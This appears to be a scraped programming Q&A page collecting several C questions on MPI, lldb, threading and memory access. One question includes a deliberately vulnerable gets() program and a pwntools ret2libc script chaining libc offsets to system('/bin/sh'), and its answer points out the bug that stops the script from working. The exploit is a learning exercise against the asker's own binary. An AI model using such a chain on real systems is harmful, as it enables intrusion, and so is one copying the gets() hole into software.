Dynamically allocating space causing error in MPI program - c

There is an MPI program that calculates the product of two matrices here:
https://gist.githubusercontent.com/kmkurn/39ca673bb37946055b38/raw/20ed8f7a7c078b82d12b9f7ef1390b9e9c67d626/mpi_mm.c
I used this exact code, but instead of hard-coding the matrix dimensions as constants I wanted to take them as command-line arguments, so I added the following code inside main:
int N = atoi(argv[1]);
int M = atoi(argv[2]);
double(*a)[M] = malloc(sizeof(double[N][M]));
double(*b)[1] = malloc(sizeof(double[M][1]));
double(*c)[1] = malloc(sizeof(double[N][1]));
int NRA = N;
int NCA = M;
int NCB = 1;
I compiled it with mpicc, ran it with mpiexec -n 4 ./a.out, and got the following error:
===================================================================================
= BAD TERMINATION OF ONE OF YOUR APPLICATION PROCESSES
= PID 4960 RUNNING AT DESKTOP-NHT8PTC
= EXIT CODE: 11
= CLEANING UP REMAINING PROCESSES
= YOU CAN IGNORE THE BELOW CLEANUP MESSAGES
===================================================================================
YOUR APPLICATION TERMINATED WITH THE EXIT STRING: Segmentation fault (signal 11)
This typically refers to a problem with your application.
Please see the FAQ page for debugging suggestions
What could be the reason for this? I am not sure what could be going wrong with just dynamic initialization of matrices.

Related

Having problem in Buffer Overflow(ret2libc) exploit

I was following a tutorial on a buffer overflow (ret2libc) attack, and it failed for reasons I can't identify. The C program I wrote is as follows:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
char buf[256];
gets(buf);
return 0;
}
I compiled it so that checksec reports:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
The exploit I have written is:
from pwn import *
proc = process("./vuln")
junk = "A"*264
libc_base = 0x00007ffff7dee000
system_offset = 0x0000000000048df0
exec_offset = 0x00000000000cb7c0
exit_offset = 0x000000000003e600
binsh_offset = 0x18a156
system = str(base64.b64encode(p64(libc_base + system_offset)))
exit = str(base64.b64encode(p64(libc_base + exit_offset)))
binsh = str(base64.b64encode(p64(libc_base + binsh_offset)))
pop_rdi = str(base64.b64encode(p64(0x00000000004011bb)))
buf = junk + pop_rdi + binsh + system + exit
proc.sendline(buf)
proc.interactive()
But immediately after I run the exploit, it gives me an error:
[+] Starting local process './vuln': pid 1595
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1595)
[*] Got EOF while sending in interactive
Can someone please tell me what the problem is here? Thanks in advance.
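Using base64.b64encode here is the problem: it turns each packed address into ASCII text, so the bytes that reach the program are base64 characters rather than the addresses themselves, and the machine executing the code never sees the values you intended.
I haven't checked the rest carefully and there may be other errors, but the first thing to do is remove the encoding and pass the raw addresses of each part.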

How to provide input when debugging my code with lldb

When I debug my program with lldb and set a breakpoint in the main function, why does the program end immediately? I expected the terminal to wait for my input ...
func.c
#include "func.h"
void insert_head(pnode *phead,pnode *ptail,int i){
pnode pnew = (pnode)calloc(1,sizeof(node));
pnew->num = i;
if(*phead == NULL){ // test the list head itself, not the address of the caller's pointer
*phead = pnew;
*ptail = pnew;
}else{
pnew->pnext = *phead;
*phead = pnew;
}
}
void print_list(pnode phead){
while(phead){
printf("%d",phead->num);
phead=phead->pnext;
}
}
main.cpp
#include "func.h"
int main()
{
pnode phead,ptail;// head and tail pointers to the list nodes
phead = ptail = NULL;
int i;
while(scanf("%d",&i) != EOF){
insert_head(&phead,&ptail,i);
}
print_list(phead);
return 0;
}
func.h
#pragma once
#include <cstdio>
#include <cstdlib>
// define the struct
typedef struct Node{
int num;
struct Node *pnext;
}node,*pnode;
// insert at the head of the list
void insert_head(pnode *phead,pnode *ptail,int i);
void print_list(pnode phead);
You can see what happens in the image. I want to figure this out, so please help me. Thanks, guys.
In the example shown above, first of all, it looks like you didn't build your code with debug information (pass -g to your compiler invocations, and make sure you aren't stripping your binary). That's why when you hit your breakpoint at main, you only see some disassembly and not your source code.
If you had debug info, then when your program hit the breakpoint at main, lldb would show you that you are stopped at the beginning of main, before your program has called scanf to query for input. You should just be able to issue the continue command in lldb, and your program will proceed to the scanf call and wait for your input.
For instance, this (admittedly horrible code) works under lldb:
> cat scanit.c
#include <stdio.h>
int
main()
{
int i;
int buffer[2000];
int idx = 0;
while(scanf("%d", &i) != EOF) {
buffer[idx++] = i;
}
for(i = 0; i < idx; i++)
printf("%d: %d\n", i, buffer[i]);
return 0;
}
> clang -g -O0 scanit.c -o scanit
> lldb scanit
(lldb) target create "scanit"
Current executable set to '/tmp/scanit' (x86_64).
(lldb) break set -n main
Breakpoint 1: where = scanit`main + 41 at scanit.c:8:7, address = 0x0000000100000e89
(lldb) run
Process 74926 launched: '/tmp/scanit' (x86_64)
Process 74926 stopped
* thread #1 tid = 0x71d134 , queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100000e89 scanit`main at scanit.c:8
5 {
6 int i;
7 int buffer[2000];
-> 8 int idx = 0;
^
9 while(scanf("%d", &i) != EOF) {
10 buffer[idx++] = i;
11 }
Target 0: (scanit) stopped.
(lldb) c
Process 74926 resuming
10 20 30 40 ^D
0: 10
1: 20
2: 30
3: 40
Process 74926 exited with status = 0 (0x00000000)
(lldb)
So that correctly fetched the input from the terminal while the program was running and provided it to the scanf call.
From what I can see, the cause of your confusion is that you didn't build your program with debug information, so when you stopped at your initial breakpoint, you didn't realize you just hadn't gotten to the call to scanf yet.
As @JimIngham's excellent answer notes, when you run lldb ./test, lldb passes terminal input to your program while it is executing (but not while it is stopped, for instance at a breakpoint).
For more complicated programs with a terminal UI, separate terminal windows (one for lldb, one for your program) might be more convenient.
To use that approach, first run your ./test program in one terminal, where it will wait for user input in scanf.
Then open another terminal window and launch
lldb -n "test"
which attaches to the running process by name.
Alternatively, you can have lldb wait for the process to launch and attach to it then
lldb -n "test" --wait-for
and in another terminal window
./test
This allows you to debug your main function and do anything you want with your program (including providing user input).

Understanding broadcast operation mpi

I have an MPI program that was given to us. It reads an integer and a double from the user, and each process then announces the values it received.
For example:
user input = 7 10.1
Output:
Process 1 got 7 and 10.100000
Process 2 got 7 and 10.100000
.
.
I understand that each process just has to announce the values entered by the user, which are delivered through a single broadcast, but the code seemed so complicated that I couldn't follow its logic.
#include <stdio.h>
#include "mpi.h"
int main(int argc, char *argv[])
{
int rank; //rank of the process
struct {int a;double b;} value;
MPI_Datatype mystruct;
int blocklens[2]; //what is this?
MPI_Aint indices[2]; //what is this?
MPI_Datatype oldtype[2];
MPI_Init(&argc,&argv); //initialize MPI environment
MPI_Comm_rank(MPI_COMM_WORLD,&rank);
blocklens[0] = 1;
blocklens[1] = 1;
oldtype[0] = MPI_INT;
oldtype[1] = MPI_DOUBLE;
MPI_Get_address(&value.a, &indices[0]);
MPI_Get_address(&value.b, &indices[1]);
indices[1] = indices[1] - indices[0];
indices[0] = 0;
MPI_Type_create_struct(2,blocklens,indices,oldtype,&mystruct);
MPI_Type_commit(&mystruct);
while (value.a >= 0) {
if (rank == 0) {
printf("Enter an integer and double: ");
fflush(stdout);
scanf("%d %lf",&value.a,&value.b);
}
MPI_Bcast(&value,1,mystruct,0,MPI_COMM_WORLD);
printf("Process %d got %d and %lf\n",rank,value.a,value.b);
}
MPI_Type_free(&mystruct);
MPI_Finalize();
return 0;
}
I would appreciate it if someone could walk me through how the code works, as I find it really hard to understand.
This code creates an MPI derived datatype so that struct value can be broadcast in a single MPI call.
This is IMHO a bad example because:
- the offsetof() macro should be used to populate the displacements array directly (and indices is a very poor name for it)
- the predefined MPI_DOUBLE_INT datatype is a perfect fit (do not forget to swap a and b in the struct value definition)
- as a matter of taste, I'd rather recommend passing the values on the command line than reading them from stdin (this is very subjective, but from experience you will avoid surprises)

C code stack corruption changing variable

I'm hoping that someone can help me out. I have not written much C code in over a decade and just picked it back up 2 days ago, so please bear with me as I am rusty. THANK YOU!
What:
I'm working on creating a very simple thread pool for an application. This code is written in C on CodeBlocks using GNU GCC for the compiler. It is built as a command line application. No additional files are linked or included.
The code should create X threads (in this case I have it set to 10), each of which sits and waits while watching an array entry (identified by the thread's index or count) for any incoming data it might need to process. Once a given child has processed the data coming in via the array, there is no need to pass the data back to the main thread; rather, the child should simply reset that array entry to 0 to indicate that it is ready to process another input. The main thread will receive requests and will dole them out to whatever thread is available. If none are available then it will refuse to handle that input.
For simplicity's sake, the code below is a complete and working, but trimmed and gutted, version that DOES exhibit the stack corruption I am trying to track down. This compiles fine and initially runs fine, but after a few passes the threadIndex value in the child thread function (workerThread) becomes corrupt and jumps to weird values, generally becoming the number of milliseconds I have passed to the 'Sleep' function.
What I have checked:
The threadIndex variable is not a global or shared variable.
All arrays are plenty big enough to handle the max number of threads I am creating.
All loops have the loop variable reset to 0 before running.
I have not named multiple variables with the same name.
I use atomic_load to make sure I don't write to the same global array variable with two different threads at once. Please note I am rusty, so I may be misunderstanding how this part works.
I have placed test cases all over to see where the variable goes nuts and I am stumped.
Best Guess
All of my research confirms what I recall from years back: I am likely going out of bounds somewhere and causing stack corruption. I have looked at numerous other problems like this on Google as well as on Stack Overflow, and while all point me to the same conclusion, I have been unable to figure out what specifically is wrong in my code.
#include<stdio.h>
//#include<string.h>
#include<pthread.h>
#include<stdlib.h>
#include<conio.h>
//#include<unistd.h>
#define ESCAPE 27
int maxThreads = 10;
pthread_t tid[21];
int ret[21];
int threadIncoming[21];
int threadRunning[21];
struct arg_struct {
char* arg1;
int arg2;
};
//sick of the stupid upper/lowercase nonsense... boom... fixed
void* sleep(int time){Sleep(time);}
void* workerThread(void *arguments)
{
//get the stuff passed in to us
struct arg_struct *args = (struct arg_struct *)arguments;
char *address = args -> arg1;
int threadIndex = args -> arg2;
//hold how many we have processed - we are unlikely to ever hit the max so no need to round robin this number at this point
unsigned long processedCount = 0;
//this never triggers so it IS coming in correctly
if(threadIndex > 20){
printf("INIT ERROR! ThreadIndex = %d", threadIndex);
sleep(1000);
}
unsigned long x = 0;
pthread_t id = pthread_self();
//as long as we should be running
while(__atomic_load_n (&threadRunning[threadIndex], __ATOMIC_ACQUIRE)){
//if and only if we have something to do...
if(__atomic_load_n (&threadIncoming[threadIndex], __ATOMIC_ACQUIRE)){
//simulate us doing something
//for(x=0; x<(0xFFFFFFF);x++);
sleep(2001);
//the value going into sleep is CLEARLY somehow ending up in index because you can change that to any number you want
//and next thing you know the next line says "First thread processing done on (the value given to sleep)
printf("\n First thread processing done on %d\n", threadIndex);
//all done doing something so clear the incoming so we can reuse it for our next one
//this error should not EVER be able to get thrown but it is.... something is corrupting our stack and going into memory that it shouldn't
if(threadIndex > 20){ printf("ERROR! ThreadIndex = %d", threadIndex); }
else{ __atomic_store_n (&threadIncoming[threadIndex], 0, __ATOMIC_RELEASE); }
//increment the processed count
++processedCount;
}
else{Sleep(10);}
}
//no need to do atomocity I don't think for this as it is only set on the exit and not read till after everything is done
ret[threadIndex] = processedCount;
pthread_exit(&ret[threadIndex]);
return NULL;
}
int main(void)
{
int i = 0;
int err;
int *ptr[21];
int doLoop = 1;
//initialize these all to set the threads to running and the status on incoming to NOT be processing
for(i=0;i < maxThreads;i++){
threadIncoming[i] = 0;
threadRunning[i] = 1;
}
//create our threads
for(i=0;i < maxThreads;i++)
{
struct arg_struct args;
args.arg1 = "here";
args.arg2 = i;
err = pthread_create(&(tid[i]), NULL, &workerThread, (void *)&args);
if (err != 0){ printf("\ncan't create thread :[%s]", strerror(err)); }
}
//loop until we hit escape
while(doLoop){
//see if we were pressed escape
if(kbhit()){ if(getch() == ESCAPE){ doLoop = 0; } }
//just for testing - actual version would load only as needed
for(i=0;i < maxThreads;i++){
//make sure we synchronize so we don't end up pointing into a garbage address or half loading when a thread accesses us or whatever was going on
if(!__atomic_load_n (&threadIncoming[i], __ATOMIC_ACQUIRE)){
__atomic_store_n (&threadIncoming[i], 1, __ATOMIC_RELEASE);
}
}
}
//exiting...
printf("\n'Esc' pressed. Now exiting...\n");
//call to end them all...
for(i=0;i < maxThreads;i++){ __atomic_store_n (&threadRunning[i], 0, __ATOMIC_RELEASE); }
//join them all back up - if we had an actual worthwhile value here we could use it
for(i=0;i < maxThreads;i++){
pthread_join(tid[i], (void**)&(ptr[i]));
printf("\n return value from thread %d is [%d]\n", i, *ptr[i]);
}
return 0;
}
Output
Here is the output I get. Note that how long it takes before it starts going crazy does seem to possibly vary but not much.
[Screenshot: output screen with error]
I don't trust your handling of args; there seems to be a race condition. Each thread is handed a pointer to a loop-local args, so what happens if you create N threads before the first one of them gets to run? Then the first thread created will probably see the args meant for the Nth thread rather than its own, and so on.
I also don't believe there is any guarantee that an automatic variable declared inside a loop like that occupies a distinct area on each iteration; after all, it goes out of scope at the end of every iteration.

How to loop and read content from a range of memory address

I'm new to C and I would like to read the contents of a range of memory addresses.
Assume that I have the following address range: 0x00065580 - 0x000655c0
This range comes from the command:
$ cat /proc/a_process_pid/maps | grep heap
00065580-000655c0 ...........heap
(Please see the hex dump image of the above range.)
I tried using a loop, thinking like a Java developer, but had no luck:
#include <stdio.h>
#define START_ADDR 0x00065580
#define END_ADDR 0x000655c0
int main(){
char *start = START_ADDR ;
char *end = END_ADDR;
for( char *i=start ; i <= end ; i++ ){
printf("%s",i);
}
return 0;
}
It generates an error:
root@localhost:~# ./test
Segmentation fault (core dumped)
Please tell me what I am doing wrong and what I need to learn about.
Modern operating systems use virtual memory: the memory addresses that a process sees are different from the physical addresses, and programs normally can't touch the memory that is owned by another process. You appear to be looking at a memory dump from one particular process, but address 0x00065580 does in reality correspond to a different physical address, e.g. 0x00123456. And inside your own program, address 0x00065580 will correspond to another physical address, e.g. 0x00589263. The operating system will ensure that none of the physical addresses that are used by the other program will be accessible from yours.
If your process is running as root, you can use system calls to indirectly access other processes' memory.
Here is a C++ program that shows how to print the addresses (and data) of particular memory locations.
#include <iostream>
int main()
{
    int *arr = new int[10];
    for (int i = 0; i < 10; i++)
        arr[i] = i + 1;
    int *end = arr + 10; // one past the last element
    // Print the address and the value of every element in [arr, end).
    for (int *p = arr; p < end; p++)
        std::cout << p << ": " << *p << '\n';
    delete[] arr; // release the array allocated with new[]
    return 0;
}
I do not see any issue in your pasted code. The problem is START_ADDR and END_ADDR, i.e. the addresses you are using in your program. These locations do not contain any valid memory for your process, so you are forcing a read from junk memory space, which results in a SEGFAULT. Hope this helps.
